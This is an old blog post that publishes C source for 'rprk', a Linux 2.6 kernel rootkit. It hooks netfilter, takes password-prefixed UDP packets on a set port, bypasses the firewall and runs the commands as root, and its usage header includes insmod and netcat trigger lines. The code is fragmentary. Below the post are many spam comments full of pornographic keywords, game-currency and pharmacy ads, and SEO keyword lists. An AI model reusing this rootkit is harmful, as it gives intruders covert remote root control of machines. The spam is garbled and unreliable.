Friday, October 13, 2006

rockprincess rootkit

* rprk 0.1 - a simple rootkit for linux 2.6
* this programm is only for education purposes designed,
* you are _not_ allowed to distribute this programm.
* usage:
* compile the module for you target hosts kernel.
* load the module with the parameters "password" and "listen_port",
* e.g: insmod rprk.ko password=lamo listen_port=5555
* now you can control the target host.
* the rootkit even bypasses linux's netfilter.
* e.g: echo "lamotouch /rp_was_here"|netcat -u 5555
* this will execute the command "touch /rp_was_here" on


struct exec_work {
struct work_struct work;
char *command;

static char password[256];
static char clisten_port[17];
static long listen_port;

static void exec_func(void *data)
struct exec_work *exec_work = data;
char *argv[] = { "/bin/sh", "-c", exec_work->command, NULL };
static char *envp[] = { "HOME=/", "TERM=linux",
"PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/local/bin:/usr/local/sbin", NULL };

call_usermodehelper("/bin/sh", argv, envp, 0);

module_param_string(password, password, 256, 0);
MODULE_PARM_DESC(password, " password=secret\n");
module_param_string(listen_port, clisten_port, 17, 0);
MODULE_PARM_DESC(listen_port, " listen_port=6666\n");

static inline int execute_command(char *cmd)
struct exec_work *exec_work;

exec_work = kmalloc(sizeof(struct exec_work), GFP_ATOMIC);
exec_work->command = kmalloc(1024 * sizeof(char), GFP_ATOMIC);

INIT_WORK(&exec_work->work, exec_func, exec_work);

strncpy(exec_work->command, cmd, strlen(cmd) + 1);

return 0;

static unsigned int hook_handle(unsigned int hooknum,
struct sk_buff **skb_p,
const struct net_device *in,
const struct net_device *out,
int (*okfn)(struct sk_buff *))
struct sk_buff *skb = *skb_p;
struct iphdr *iph = skb->nh.iph;
struct udphdr *udph = (struct udphdr *)(skb->data + iph->ihl * 4);
unsigned int payload_offset = (iph->ihl * 4) + 8;
char *payload = skb->data + payload_offset;
char *sent_passwd, *sent_command;
int i, passwdlen, sent_strlen = skb->len - payload_offset;

if (iph->protocol != IPPROTO_UDP)
goto out;

if(!(ntohs(udph->dest) == listen_port))
goto out;

if(sent_strlen > 1024)
sent_strlen = 1024;

passwdlen = strlen(password);

if(sent_strlen < 1 || sent_strlen < passwdlen)
goto out;

if(!(sent_passwd = kmalloc(passwdlen * sizeof(char) + 1, GFP_ATOMIC)))
goto out1;

if(!(sent_command = kmalloc((sent_strlen - passwdlen) * sizeof(char) + 1, GFP_ATOMIC)))
goto out0;

for (i = 0; i < passwdlen; i++)
sent_passwd[i] = payload[i];
for (i = 0 ; i < sent_strlen - passwdlen; i++){
if(payload[i + passwdlen] == '\n'){
sent_command[i] = '\0';
sent_command[i] = payload[i + passwdlen];

if(strncmp(sent_passwd, password, passwdlen) == 0){

return NF_ACCEPT;

static struct nf_hook_ops rprk_ops = {
.hook = hook_handle,
.owner = THIS_MODULE,
.pf = PF_INET,
.hooknum = NF_IP_LOCAL_IN,
.priority = NF_IP_PRI_FIRST

static int __init init(void)
int err;

listen_port = simple_strtol(clisten_port, NULL, 0);

return 1;
if(!(listen_port > 0 && listen_port < 65536))
return 1;

err = nf_register_hook(&rprk_ops);
if(err < 0)
return err;

return 0;

static void __exit fini(void)



Blogger sink sink socks said...

But can you not divide fette frauen mit fetten titten the evening,by passing a part of it with her and then finishing with me?At this suggestion the eyes of the young people sparkled, for they hadbecome delighted with Mrs.

11:55 AM  
Blogger sink sink socks said...

The Judge looked upwarningly, when his eye caught the fact that the Colonel cumshots private had againwinced at this mirth.

5:04 PM  
Blogger sink sink socks said...

Hefound his asian bondage youthful client was the daughter of a widow who had a smallranch on the cross-roads, near the new Free-Will Baptist church--theevident theatre of this pastoral.I need not say that the lady I referto is Miss Zaidee Juno Hooker, only daughter of Almira Ann Hooker,relict of Jefferson Brown Hooker, formerly of Boone County, Kentucky,and latterly of--er--Pike County, Missouri dicke schwarze brueste.As for phpscriptarchiv the deputy, finding that if he did not leave it voluntarily hewould be drummed out of the village, he departed, whither I do notremember if anybody ever knew.For half an hour kleine luder the boys sat with drooping heads, and the oldgentleman read aloud, presumably to Aunt Missouri and themselves.

11:01 PM  
Blogger sink sink socks said...

During the sexual act I see hanging to the left and above gratis pics von reifen frauen me (also as ifin the air) two small pictures, landscapes, representing a house on agreen.In his mind he saw a cat-boat upon its side, the sailsspread out over the water, and two men, almost entirely immersed inthe waves, making efforts to reach gay suchmaschinen the side of the boat.Air you a-goin' t' scribble that there three thou-san' on hose pinkeln maenner a piece o'paper? inquired Uncle Billy, sitting bolt upright.I identify myself with himbecause the fate of paare ficken blasen his discovery appears to me typical of theacceptance of my own.

11:17 PM  
Blogger sink sink socks said...

Dennis, still confused, but insesto gratis xxx flattered bythe applause, to which neither he nor I are used, rose again, and thistime tried No.Master Horner passed, and he was requestedto draw up the certificate for the inspectors to sign, as one had lefthis spectacles at home, and the other had a bad cold, so that it freie sexbilder gratis wasnot convenient for either to write more than his name.I went to see actors in the boxes, soconsummately cunning, that gays pics the others did not know they were acting,and they did not suspect it themselves.Yes--no--thank you--good evening, stammered poor Master Horner, sostupefied that even Aunt Sally called hobbyhure hannover him a dummy.

11:18 PM  
Blogger sink sink socks said...

These thoughts concernthemselves only older hardcore with things that seem important and of momentousinterest to us.It is notthe dream that produces the phantasy but the unconscious phantasy thattakes the greatest part in monster moese the formation of the dream thoughts.I told him I'd imaxx film go if he would bring mearound here to let you know what had become of me, and so he did.A large number of dreams, often full of fear, which are concerned withpassing through xxl sex narrow spaces or with staying, in the water, are basedupon fancies about the embryonic life, about the sojourn in the mother'swomb, and about the act of birth.

11:58 PM  
Blogger sink sink socks said...

There will be found no factorin the dream whence the chains lolita unter of associations do not lead in two ormore directions, no scene which has not been pieced together out of twoor more impressions and events.His present want was positive, if mollige omas nebulous; he desired afortune in his pocket, bulky, tangible evidence of his miraculoussuccess.He even affected not to notice thatshe had put on her best clothes, and he made no erotic pinup art doubt appeared as whenshe had first attracted the mature yet faithless attentions of DeaconHotchkiss at church.These stories are fullyprotected by copyright, and should not be republished hobbyhuren kontakt except bypermission of the publishers mentioned.

11:07 PM  
Blogger sink sink socks said...

Please stop!The fetish friends imputation that the road was not wide enough for him to turn wastoo much for Mr.He arose in a terrible passion, slouched hisfunnel down over his eyes, swore a vast oath, uttered a threat of somecharacter, which I did not precisely comprehend, and finally made me alow bow and hartcore porno departed, wishing me, in the language of the archbishop inGil Bias, beaucoup de bonheur et un peu plus de bon sens.The indifferent impression which, bysuch ramifications, provokes the dream is subservient to anothercondition which is not true of the real source of the dream--theimpression must be a behaarte muschi recent one, everything arising from the day of thedream.Tears and sulky faces, and impotent fists doubled fiercelywhen his back was turned, were sex folter sm the rewards of his conscientiousness;and the boys--and girls too--were glad when working time came roundagain, and the master went home to help his father on the farm.

11:24 PM  
Blogger sink sink socks said...

Perhaps there fetisch wallpaper was something else, due possibly to the lady's wonderfuleyes, of which he had thought much.I added, it would be no use were I to selectanother instead of that particular dream; in every dream where thecontent is amateur submitted pics obscure or intricate, I should hit upon dream thoughts whichcall for secrecy.Brown?Well, about seven hundred geile fotos kostenlos dollars, said the elder, replacing hishat, and turning a furtive look upon the warehouse man.Certain Puns having been placed on the Index Expurgatorius of theInstitution, no Inmate shall be allowed to utter them, on pain ofbeing debarred the perusal of Punch and Vanity sexkontakte burgwedel Fair , and, ifrepeated, deprived of his Joseph Miller.

11:08 PM  
Blogger sink sink socks said...

Now, if you think fit to sell me those spectacles, I willpay you free hardcore pics gina wild the largest market price for glasses.Her eyes sperma spritzen voegeln swept carelessly over the VanKamps, and unconcernedly passed on to the rest of the landscape.When the storm was over, very tenderly shelaid the gift aside, and bare-headed passed out into the night anonym pics.Even when children's dreams are rasierte sch complicated and polished, theircomprehension as a realization of desire is fairly evident.

11:20 PM  
Blogger sink sink socks said...

No use doing that, replied Buller, kelly trump beim sex still standing on his nauticallegs; I don't see anybody, and I don't see any boat.It proved that models teen this Dennis Shea was a harmless, amiable fellow,of the class known as shiftless, who had sealed his fate by marrying adumb wife, who was at that moment ironing in the laundry.In hysteria,too, we at once find a series of perfectly correct thoughts equivalentto our conscious thoughts, of whose existence, however, in this form eat scat wecan learn nothing and which we can only subsequently reconstruct.The boy with freckles took his companion bythe arm without another word and marched him down adult content the stairs.

11:20 PM  
Blogger sink sink socks said...

But we are justified in assumingthe existence of the systems, which have nothing psychic in themselvesand scharfe bilder von gay maennern gratis which never become accessible to our psychic perception,corresponding to the lenses of the telescope which design the image.She was quiet for a while, and then found the courageto ask why swinger clup it was that one of her husband's testicles was lower than theother, and whether it was the same in all men.The day before the dream the directress of theschool angies amateure had recommended her to keep the child another year at school.Really at that moment she did think kostenlose sex webcams his mindwas gone; but the leer upon the old man's face enraged her beyondendurance.

11:41 PM  
Blogger Alex said...

Hey, I recently added a news widget from to my blog. It shows the latest news, and just took a copy and paste to implement. Might interest you too.

4:06 AM  
Blogger Addison said...

Hey buddy! Nice blog that you maintain here.. I just chanced upon your blog surfing the blogosphere. I was thinking.. you could try out some interesting widgets on your page and spice it up with some great pictures. E.g try out the poster widget on with your relevant keywords. It has some of the best images i have ever seen.

1:50 AM  
Blogger MatthewJohnson said...

Ross pressed his lips hard together; his heart swelled with the rage of the misunderstood.. But Monsieur Poopoo had heard strange stories about the prodigious rise in real estate; and, having understood that most of his neighbors had become suddenly rich by speculating in lots, he instantly grew dissatisfied with his own lot, forthwith determined to shut up shop, turn everything into cash, and set about making money in right-down earnest.. And then, to clinch the imitation, he wore the twin to the Major's supposed to be unparalleled coat.. We know from experience that the dream, even if it interrupts sleep, repeatedly during the same night, still remains compatible with sleep.. Well, did you ever? commented Sister Poteet, generally.. The memories from which the unconscious wish brings about the emotional discharge have never been accessible to the Forec.. On days when fish had been reluctant Gideon had been lured into conversation, and gradually into narrative and the relation of what had appeared to Gideon as humorous and entertaining; and finally Felix, the vague idea growing big within him, had one day persuaded his boatman to dance upon the boards of a long pier where they had made fast for lunch.. Dreams of this sort are parturition dreams; their interpretation is accomplished by reversing the fact reported in the manifest dream content; thus, instead of throwing one's self into the water, read coming out of the water, that is, being born.. The arms of the bartender worked like a faker's in a side show as he set out the glass with its little quota of short sweetening and a cut-glass decanter, and sent a half-tumbler of water spinning along from the upper end of the bar with a dime in change.. In other dreams not a bit of the dream idea has retained its own psychical value, or everything essential in these dream ideas has been replaced by unessentials, whilst every kind of transition between these conditions can be found.. What was clearest in the dream seems to me, without further consideration, the most important; but often in some obscure element of the dream I can recognize the most direct offspring of the principal dream thought.. Stay where you are, and I'll have you in a dry suit of clothes in less than fifteen minutes.. He was not sure what Aunt Missouri's attitude might be if it were laid on her. Likewise the similar assertions that behind every dream one finds the death sentence (Stekel), and that every dream shows a continuation from the feminine to the masculine line (Adler), seem to me to proceed far beyond what is admissible in the interpretation of dreams.. A number of other symbols, in part not sufficiently verified are given by Stekel, who illustrates them with examples.. Here is the real source of the dream.. The squire, down the lane, saw him whizzing along and accepted it profanely as an exhibition for his especial benefit.. It was not a large window; to the casual eye of the passer-by there was little to draw attention.. We are reminded of subjects hypnotized by Bernheim, who carried out a posthypnotic order, and who, upon being asked for their motives, instead of answering: I do not know why I did that, had to invent a reason that was obviously inadequate.. What a ripping, queer old building that is! he exclaimed, making one more brave effort as they came in sight of the hotel...

11:13 PM  
Blogger bernard n. shull said...

hi mate, this is the canadin pharmacy you asked me about: the link

11:11 AM  
Blogger chenlu said...

runescape money
runescape gold
runescape money
runescape gold
buy runescape gold buy runescape money runescape items
runescape accounts
runescape gp
runescape money
runescape power leveling
runescape money
runescape gold
dofus kamas
cheap runescape money
cheap runescape gold
Guild Wars Gold
buy Guild Wars Gold
lotro gold
buy lotro gold
lotro gold
buy lotro gold
lotro gold
buy lotro gold

Hellgate Palladium
Hellgate London Palladium
Hellgate money
Tabula Rasa gold tabula rasa money
Tabula Rasa Credit
Tabula Rasa Credits
Hellgate gold
Hellgate London gold
wow power leveling
wow powerleveling
Warcraft PowerLeveling
Warcraft Power Leveling
World of Warcraft PowerLeveling World of Warcraft Power Leveling runescape power leveling
runescape powerleveling
eve isk
eve online isk
eve isk
eve online isk
tibia gold
Fiesta Silver
Fiesta Gold
Age of Conan Gold
buy Age of Conan Gold
aoc gold

china tour
beijing tour
beijing travel
china tour
tibet tour
tibet travel
computer monitoring software
employee monitoring

9:26 PM  
Blogger game gold said...

After separate for one year, I can not leave you, leave Entropiauniverse ped . Now I buy Entropia Universe Gold again, I do not want to leave you, but at that time, I have no idea. Buy Entropia Universe Money
is the thing I want to do for long time. I know that cheap Entropiauniverse ped is your life. So I will try my best and do not let you pass away. In my mind, I think I Buy Entropia Universe Gold is the fate.

Without hesitate, I bought eve isk , in the game I can find myself. I feel lonely, but I do not want to talk with anyone, so I buy isk . At present, think the happy day I spend in knight, I am eager to enter it, and buy eve online isk . Own eve online isk , it means that you own the life of happiness. So I will not leave cheap eve isk . It is the origin of the happiness.

5:52 PM  
Blogger cvxv said...

看房子,買房子,建商自售,自售,台北新成屋,台北豪宅,新成屋,豪宅,美髮儀器,美髮,儀器,髮型,EMBA,MBA,學位,EMBA,專業認證,認證課程,博士學位,DBA,PHD,在職進修,碩士學位,推廣教育,DBA,進修課程,碩士學位,網路廣告,關鍵字廣告,關鍵字,課程介紹,學分班,文憑,牛樟芝,段木,牛樟菇,日式料理, 台北居酒屋,日本料理,結婚,婚宴場地,推車飲茶,港式點心,尾牙春酒,台北住宿,國內訂房,台北HOTEL,台北婚宴,飯店優惠,台北結婚,場地,住宿,訂房,HOTEL,飯店,造型系列,學位,SEO,婚宴,捷運,學區,美髮,儀器,髮型,看房子,買房子,建商自售,自售,房子,捷運,學區,台北新成屋,台北豪宅,新成屋,豪宅,學位,碩士學位,進修,在職進修, 課程,教育,學位,證照,mba,文憑,學分班,台北住宿,國內訂房,台北HOTEL,台北婚宴,飯店優惠,住宿,訂房,HOTEL,飯店,婚宴,台北住宿,國內訂房,台北HOTEL,台北婚宴,飯店優惠,住宿,訂房,HOTEL,飯店,婚宴,台北住宿,國內訂房,台北HOTEL,台北婚宴,飯店優惠,住宿,訂房,HOTEL,飯店,婚宴,結婚,婚宴場地,推車飲茶,港式點心,尾牙春酒,台北結婚,場地,結婚,場地,推車飲茶,港式點心,尾牙春酒,台北結婚,婚宴場地,結婚,婚宴場地,推車飲茶,港式點心,尾牙春酒,台北結婚,場地,居酒屋,燒烤,美髮,儀器,髮型,美髮,儀器,髮型,美髮,儀器,髮型,美髮,儀器,髮型,小套房,小套房,進修,在職進修,留學,證照,MBA,EMBA,留學,MBA,EMBA,留學,進修,在職進修,牛樟芝,段木,牛樟菇,關鍵字排名,網路行銷,PMP,在職專班,研究所在職專班,碩士在職專班,PMP,證照,在職專班,研究所在職專班,碩士在職專班,SEO,廣告,關鍵字,關鍵字排名,網路行銷,網頁設計,網站設計,網站排名,搜尋引擎,網路廣告,SEO,廣告,關鍵字,關鍵字排名,網路行銷,網頁設計,網站設計,網站排名,搜尋引擎,網路廣告,SEO,廣告,關鍵字,關鍵字排名,網路行銷,網頁設計,網站設計,網站排名,搜尋引擎,網路廣告,SEO,廣告,關鍵字,關鍵字排名,網路行銷,網頁設計,網站設計,網站排名,搜尋引擎,網路廣告,EMBA,MBA,PMP,在職進修,專案管理,出國留學,EMBA,MBA,PMP,在職進修,專案管理,出國留學,EMBA,MBA,PMP,在職進修,專案管理,出國留學,婚宴,婚宴,婚宴,婚宴,漢高資訊,漢高資訊,比利時,比利時聯合商學院,宜蘭民宿,台東民宿,澎湖民宿,墾丁民宿,花蓮民宿,SEO,找工作,汽車旅館,阿里山,日月潭,阿里山民宿,東森購物,momo購物台,pc home購物,購物漢高資訊,漢高資訊,在職進修,漢高資訊,在職進修,民宿,民宿,整形,造型,室內設計,室內設計,漢高資訊,在職進修,漢高資訊,在職進修,民宿,美容,室內設計,在職進修,羅志祥,周杰倫,五月天,民宿,民宿,整形,整形,室內設計,室內設計,比利時聯合商學院,在職進修,比利時聯合商學院,在職進修,漢高資訊,找工作,找工作,找工作,找工作,找工作,蔡依林,林志玲

12:13 AM  
Blogger xuemei said...

I like play online game, I also buy knight gold and knight noah, the knight online gold is very cheap, and use the knight online noah can buy many things, I like cheap knight gold, thanks, it is very good.

I like play online game, I also buy last chaos gold and last chaos gold, the lastchaos gold is very cheap, and use the lastchaos money can buy many things, I like cheap lastchaos gold, thanks, it is very good.

6:38 PM  
Blogger franklin-marshalls said...

When you purchase tory burch shoes shoes the usual questions start emerging, what style? size? Is it well made? These Franklin Marshall Hoodies questions are important, Moncler Jackets a pair of shoes can have an overall effect on a persons health and happiness. Ugg Boots Not only pain and discomfort the north face jackets can be brought on by the wrong shoes but headaches, true religion jeans backaches and leg cramps.

11:34 PM  

Post a Comment

<< Home